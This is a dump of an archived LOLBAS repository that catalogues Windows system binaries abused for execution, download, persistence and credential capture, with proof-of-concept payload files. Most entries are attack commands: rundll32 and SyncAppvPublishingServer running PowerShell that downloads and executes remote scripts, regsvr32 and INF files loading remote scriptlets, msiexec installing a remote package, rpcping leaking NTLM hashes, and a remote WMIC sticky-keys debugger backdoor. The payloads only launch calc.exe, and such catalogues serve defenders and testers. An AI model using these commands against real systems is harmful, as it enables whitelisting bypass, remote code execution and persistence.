<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<d2p1:checkTypes>false</d2p1:checkTypes>
<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
<d2p1:compilerOptions i:nil="true" />
<d2p1:generateCCU>false</d2p1:generateCCU>
<d2p1:languageToUse>CSharp</d2p1:languageToUse>
<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
<d2p1:mtInfo i:nil="true" />
<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
</parameters>
</CompilerInput>


================================================
FILE: Archive-Old-Version/OSBinaries/Microsoft.Wrokflow.Compiler.xoml
================================================
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
    <CodeActivity x:Name="codeActivity1" />
    <x:Code><![CDATA[
    public class Foo : SequentialWorkflowActivity {
     public Foo() {
            Console.WriteLine("FOOO!!!!");
        }
    }
    ]]></x:Code>
</SequentialWorkflowActivity>


================================================
FILE: Archive-Old-Version/OSBinaries/Msbuild.exe.md
================================================
## Msbuild.exe
* Functions: Execute
```

msbuild.exe pshell.xml
Build and execute a C# project stored in the target XML file.

msbuild.exe Msbuild.csproj
Build and execute a C# project stored in the target CSPROJ file.
```
   
* Resources:   
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
  * https://github.com/Cn33liz/MSBuildShell
  * https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
   
* Full path:   
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
   
* Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Msconfig.exe.md
================================================
## Msconfig.exe
* Functions: Execute
```

Msconfig.exe -5
Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/991314564896690177
   
* Full path:   
  * c:\windows\system32\msconfig.exe
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
See the Payloads folder for an example mscfgtlc.xml file.
  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Msdt.exe.md
================================================
## Msdt.exe
* Functions: Execute
```

Open .diagcab package


msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
```
   
* Resources:   
  * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
  * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
  * https://twitter.com/harr0ey/status/991338229952598016
   
* Full path:   
  * C:\Windows\System32\Msdt.exe    
  * C:\Windows\SysWOW64\Msdt.exe    
   
* Notes: Thanks to:
See the Payloads folder for an example PCW8E57.xml file.
  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Msiexec.exe.md
================================================
## Msiexec.exe
* Functions: Execute
```

msiexec /quiet /i cmd.msi
Installs the target .MSI file silently.

msiexec /q /i http://192.168.100.3/tmp/cmd.png
Installs the target remote & renamed .MSI file silently.

msiexec /y "C:\folder\evil.dll"
Calls DLLRegisterServer to register the target DLL.

msiexec /z "C:\folder\evil.dll"
Calls DLLRegisterServer to un-register the target DLL.
```
   
* Resources:   
  * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
  * https://twitter.com/PhilipTsukerman/status/992021361106268161
   
* Full path:   
  * c:\windows\system32\msiexec.exe
  * c:\windows\sysWOW64\msiexec.exe
   
* Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Netsh.exe.md
================================================
## Netsh.exe
* Functions: Execute, Surveillance
```

netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
netsh.exe trace show status

Capture network traffic on remote file share.

netsh.exe add helper C:\Path\file.dll
Load (execute) NetSh.exe helper DLL file.

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Forward traffic from the listening address and proxy to a remote system.
```
   
* Resources:   
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
  * https://attack.mitre.org/wiki/Technique/T1128
  * https://twitter.com/teemuluotio/status/990532938952527873
   
* Full path:   
  * C:\Windows\System32
  * C:\Windows\SysWOW64
   
* Notes:   
   


================================================
FILE: Archive-Old-Version/OSBinaries/Nltest.exe.md
================================================
## Nltest.exe
* Functions: Credentials
```

nltest.exe /SERVER:192.168.1.10 /QUERY

```
   
* Resources:   
  * https://twitter.com/sysopfb/status/986799053668139009
  * https://ss64.com/nt/nltest.html
   
* Full path:   
  * c:\windows\system32\nltest.exe
   
* Notes: Thanks to Sysopfb - @sysopfb  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Openwith.exe.md
================================================
## Openwith.exe
* Functions: Execute
```

OpenWith.exe /c C:\test.hta
Opens the target file with the default application.

OpenWith.exe /c C:\testing.msi
Opens the target file with the default application.
```
   
* Resources:   
  * https://twitter.com/harr0ey/status/991670870384021504
   
* Full path:   
  * c:\windows\system32\Openwith.exe
  * c:\windows\sysWOW64\Openwith.exe
   
* Notes: Thanks to Matt harr0ey - @harr0ey  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Cmstp.inf
================================================
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"

================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Cmstp_calc.sct
================================================
<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->

	<!-- .sct files when downloaded, are executed from a path like this -->
	<!-- Please Note, file extenstion does not matter -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
  	<!-- You can either execute locally, or from a url -->
	<script language="JScript">
		<![CDATA[
	    		// calc.exe should launch, this could be any arbitrary code.
      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
	
		]]>
</script>
</registration>
</scriptlet>

================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Evil.xbap
================================================
private void Button_click(object sender, RoutedEventArgs e)
{
	if (RadioButton1.IsChecked == true)
	{
		Process.Start("C:\\poc\\evil.exe");
		MessageBox.Show("BHello.");
	}
}


================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall.inf
================================================
[Version] 
Signature=$CHICAGO$

[DefaultInstall]
UnregisterDlls = Squiblydoo

[Squiblydoo]
11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct

================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall_calc.sct
================================================
<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		<![CDATA[
	
			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	
		]]>
</script>
</registration>
</scriptlet>

================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Msbuild.csproj
================================================
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
  <!-- Feel free to use a more aggressive class for testing. -->
  <Target Name="Hello">
   <FragmentExample />
   <ClassExample />
  </Target>
  <UsingTask
    TaskName="FragmentExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>
      <Using Namespace="System" />  
      <Code Type="Fragment" Language="cs">
        <![CDATA[
			    Console.WriteLine("Hello From a Code Fragment");		
        ]]>
      </Code>
    </Task>
	</UsingTask>
	<UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<!-- <Reference Include="System.IO" /> Example Include -->		
      <Code Type="Class" Language="cs">
        <![CDATA[
			using System;
			using Microsoft.Build.Framework;
			using Microsoft.Build.Utilities;
				
			public class ClassExample :  Task, ITask
			{
				public override bool Execute()
				{
					Console.WriteLine("Hello From a Class.");
					return true;
				}
			}
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Mshta_calc.sct
================================================
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
	<!-- DFIR -->
	<!--		.sct files are downloaded and executed from a path like this -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->


	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	}

]]>
</script>

</scriptlet>

================================================
FILE: Archive-Old-Version/OSBinaries/Payload/PCW8E57.xml
================================================

<?xml version="1.0" encoding="utf-16"?>
<Answers Version="1.0">
	<Interaction ID="IT_LaunchMethod">
		<Value>ContextMenu</Value>
	</Interaction>
	<Interaction ID="IT_SelectProgram">
		<Value>NotListed</Value>
	</Interaction>
	<Interaction ID="IT_BrowseForFile">
		<Value>C:\Windows\assembly\Exec-Execute.msi</Value>
	</Interaction>
</Answers>


================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Regsvr32_calc.sct
================================================
<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->

	<!-- .sct files when downloaded, are executed from a path like this -->
	<!-- Please Note, file extenstion does not matter -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
  	<!-- You can either execute locally, or from a url -->
	<script language="JScript">
		<![CDATA[
	    		// calc.exe should launch, this could be any arbitrary code.
      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
	
		]]>
</script>
</registration>
</scriptlet>

================================================
FILE: Archive-Old-Version/OSBinaries/Payload/Wmic_calc.xsl
================================================
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	]]> </ms:script>
</stylesheet>

================================================
FILE: Archive-Old-Version/OSBinaries/Payload/file.rsp
================================================
REGSVR evil.dll


================================================
FILE: Archive-Old-Version/OSBinaries/Payload/mscfgtlc.xml
================================================
<?xml version="1.0" ?>
<MSCONFIGTOOLS>
<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe" DEFAULT_OPT="-nop -sta -enc -w 1 <BASE64ENCCOMMAND>" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/>
</MSCONFIGTOOLS>


================================================
FILE: Archive-Old-Version/OSBinaries/Pcalua.exe.md
================================================
## Pcalua.exe
* Functions: Execute
```

pcalua.exe -a calc.exe
Open the target .EXE using the Program Compatibility Assistant.

pcalua.exe -a \\server\payload.dll
Open the target .DLL file with the Program Compatibilty Assistant.

pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Open the target .CPL file with the Program Compatibility Assistant.
```
   
* Resources:   
  * https://twitter.com/KyleHanslovan/status/912659279806640128
   
* Full path:   
  * c:\windows\system32\pcalua.exe
   
* Notes: Thanks to:
fab - @0rbz_
Kyle Hanslovan - @KyleHanslovan
  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Pcwrun.exe.md
================================================
## Pcwrun.exe
* Functions: Execute
```

Pcwrun.exe c:\temp\beacon.exe
Open the target .EXE file with the Program Compatibility Wizard.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/991335019833708544
   
* Full path:   
  * c:\windows\system32\pcwrun.exe
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Powershell.exe.md
================================================
## Powershell.exe
* Functions: Execute, Read ADS
```

powershell -ep bypass - < c:\temp:ttt
Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
```
   
* Resources:   
  * https://twitter.com/Moriarty_Meng/status/984380793383370752
   
* Full path:   
  * C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  * C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   
* Notes: Thanks to Moriarty - @Moriarty_Meng  
   


================================================
FILE: Archive-Old-Version/OSBinaries/PresentationHost.exe.md
================================================
## PresentationHost.exe
* Functions: Execute
```

Presentationhost.exe C:\temp\Evil.xbap
Executes the target XAML Browser Application (XBAP) file.
```
   
* Resources:   
  * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
  * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
   
* Full path:   
  * c:\windows\system32\PresentationHost.exe     
  * c:\windows\sysWOW64\PresentationHost.exe    
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Print.exe.md
================================================
## Print.exe
* Functions: Download, Copy, Add ADS
```

print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Copy file.exe into the Alternate Data Stream (ADS) of file.txt.

print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe

print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
```
   
* Resources:   
  * https://twitter.com/Oddvarmoe/status/985518877076541440
  * https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
   
* Full path:   
  * C:\Windows\System32\print.exe
  * C:\Windows\SysWOW64\print.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Psr.exe.md
================================================
## Psr.exe
* Functions: Surveillance
```

psr.exe /start /gui 0 /output c:\users\user\out.zip
Capture screenshots of the desktop and save them in the target .ZIP file.

psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip
Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.

psr.exe /stop
Stop the Problem Step Recorder.
```
   
* Resources:   
  * https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
   
* Full path:   
  * C:\Windows\System32\Psr.exe
  * C:\Windows\SysWOW64\Psr.exe
   
* Notes: Thanks to   
   


================================================
FILE: Archive-Old-Version/OSBinaries/Regasm.exe.md
================================================
## Regasm.exe
* Functions: Execute
```

regasm.exe /U AllTheThingsx64.dll
Loads the target .DLL file and executes the UnRegisterClass function.

regasm.exe AllTheThingsx64.dll
Loads the target .DLL file and executes the RegisterClass function.
```
   
* Resources:   
  * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
   
* Full path:   
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Register-cimprovider.exe.md
================================================
## Register-cimprovider.exe
* Functions: Execute
```

Register-cimprovider -path "C:\folder\evil.dll"
Load the target .DLL.
```
   
* Resources:   
  * https://twitter.com/PhilipTsukerman/status/992021361106268161
   
* Full path:   
  * c:\windows\system32\Register-cimprovider.exe
  * c:\windows\sysWOW64\Register-cimprovider.exe
   
* Notes: Thanks to PhilipTsukerman - @PhilipTsukerman  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Regsvcs.exe.md
================================================
## Regsvcs.exe
* Functions: Execute
```

regsvcs.exe AllTheThingsx64.dll
Loads the target .DLL file and executes the RegisterClass function.
```
   
* Resources:   
  * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
   
* Full path:   
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Regsvr32.exe.md
================================================
## Regsvr32.exe
* Functions: Execute
```

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Execute the specified remote .SCT script with scrobj.dll.


Execute the specified local .SCT script with scrobj.dll.
```
   
* Resources:   
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  * https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
   
* Full path:   
  * C:\Windows\System32\regsvr32.exe
  * C:\Windows\SysWOW64\regsvr32.exe
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Replace.exe.md
================================================
## Replace.exe
* Functions: Copy, Download
```

replace.exe C:\Source\File.cab C:\Destination /A
Copy the specified file to the destination folder.

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Copy the specified file to the destination folder.
```
   
* Resources:   
  * https://twitter.com/elceef/status/986334113941655553
  * https://twitter.com/elceef/status/986842299861782529
   
* Full path:   
  * C:\Windows\System32\replace.exe
  * C:\Windows\SysWOW64\replace.exe
   
* Notes: Thanks to elceef - @elceef  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Robocopy.exe.md
================================================
## Robocopy.exe
* Functions: Copy
```

Robocopy.exe C:\SourceFolder C:\DestFolder
Copy the entire contents of the SourceFolder to the DestFolder.

Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
Copy the entire contents of the SourceFolder to the DestFolder.
```
   
* Resources:   
  * https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
   
* Full path:   
  * c:\windows\system32\binary.exe
  * c:\windows\sysWOW64\binary.exe
   
* Notes: Thanks to Name of guy - @twitterhandle  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Rpcping.exe.md
================================================
## Rpcping.exe
* Functions: Credentials
```

rpcping -s 127.0.0.1 -t ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.

rpcping -s 192.168.1.10 -ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.

rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
```
   
* Resources:   
  * https://twitter.com/subtee/status/872797890539913216
  * https://github.com/vysec/RedTips
  * https://twitter.com/vysecurity/status/974806438316072960
  * https://twitter.com/vysecurity/status/873181705024266241
   
* Full path:   
  * C:\Windows\System32\rpcping.exe
  * C:\Windows\SysWOW64\rpcping.exe
   
* Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Rundll32.exe.md
================================================
## Rundll32.exe
* Functions: Execute, Read ADS
```

rundll32.exe AllTheThingsx64,EntryPoint
Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Use Rundll32.exe to execute a JavaScript script that runs calc.exe.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.

rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
```
   
* Resources:   
  * https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
  * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
   
* Full path:   
  * C:\Windows\System32\rundll32.exe
  * C:\Windows\SysWOW64\rundll32.exe
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Runonce.exe.md
================================================
## Runonce.exe
* Functions: Execute
```

Runonce.exe /AlternateShellStartup
Executes a Run Once Task that has been configured in the registry.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/990717080805789697
  * https://cmatskas.com/configure-a-runonce-task-on-windows/
   
* Full path:   
  * c:\windows\system32\runonce.exe
  * c:\windows\sysWOW64\runonce.exe
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Requires Administrative access.  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Runscripthelper.exe.md
================================================
## Runscripthelper.exe
* Functions: Execute
```

runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Execute the PowerShell script named test.txt.
```
   
* Resources:   
  * https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
   
* Full path:   
  * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe    
  * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe     
   
* Notes: Thanks to Matt Graeber - @mattifestation  
   


================================================
FILE: Archive-Old-Version/OSBinaries/SC.exe.md
================================================
## SC.exe
* Functions: Execute, Read ADS, Create Service, Start Service
```

sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice


```
   
* Resources:   
  * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
   
* Full path:   
  * C:\Windows\System32\sc.exe
  * C:\Windows\SysWOW64\sc.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Scriptrunner.exe.md
================================================
## Scriptrunner.exe
* Functions: Execute
```

Scriptrunner.exe -appvscript calc.exe
Execute calc.exe.

ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Execute the calc.cmd script on the remote share.
```
   
* Resources:   
  * https://twitter.com/KyleHanslovan/status/914800377580503040
  * https://twitter.com/NickTyrer/status/914234924655312896
  * https://github.com/MoooKitty/Code-Execution
   
* Full path:   
  * c:\windows\system32\scriptrunner.exe
  * c:\windows\sysWOW64\scriptrunner.exe
   
* Notes: Thanks to Nick Tyrer - @NickTyrer  
   


================================================
FILE: Archive-Old-Version/OSBinaries/SyncAppvPublishingServer.exe.md
================================================
## SyncAppvPublishingServer.exe
* Functions: Execute
```

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Example command on how inject Powershell code into the process
```
   
* Resources:   
  * https://twitter.com/monoxgas/status/895045566090010624
   
* Full path:   
  * C:\Windows\System32\SyncAppvPublishingServer.exe
   
* Notes: Thanks to Nick Landers - @monoxgas  
   


================================================
FILE: Archive-Old-Version/OSBinaries/WMIC.exe.md
================================================
## WMIC.exe
* Functions: Reconnaissance, Execute, Read ADS
```

wmic.exe process call create calc
Execute calc.exe.

wmic.exe process call create "c:\ads\file.txt:program.exe"
Execute a .EXE file stored as an Alternate Data Stream (ADS).

wmic.exe useraccount get /ALL
List the user accounts on the machine.

wmic.exe process get caption,executablepath,commandline
Gets the command line used to execute a running program.

wmic.exe qfe get description,installedOn /format:csv
Gets a list of installed Windows updates.

wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%")
Check to see if the target system is running SQL.

get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
Use the PowerShell cmdlet to list the shares on a remote server.

wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.

wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Execute evil.exe on the remote system.

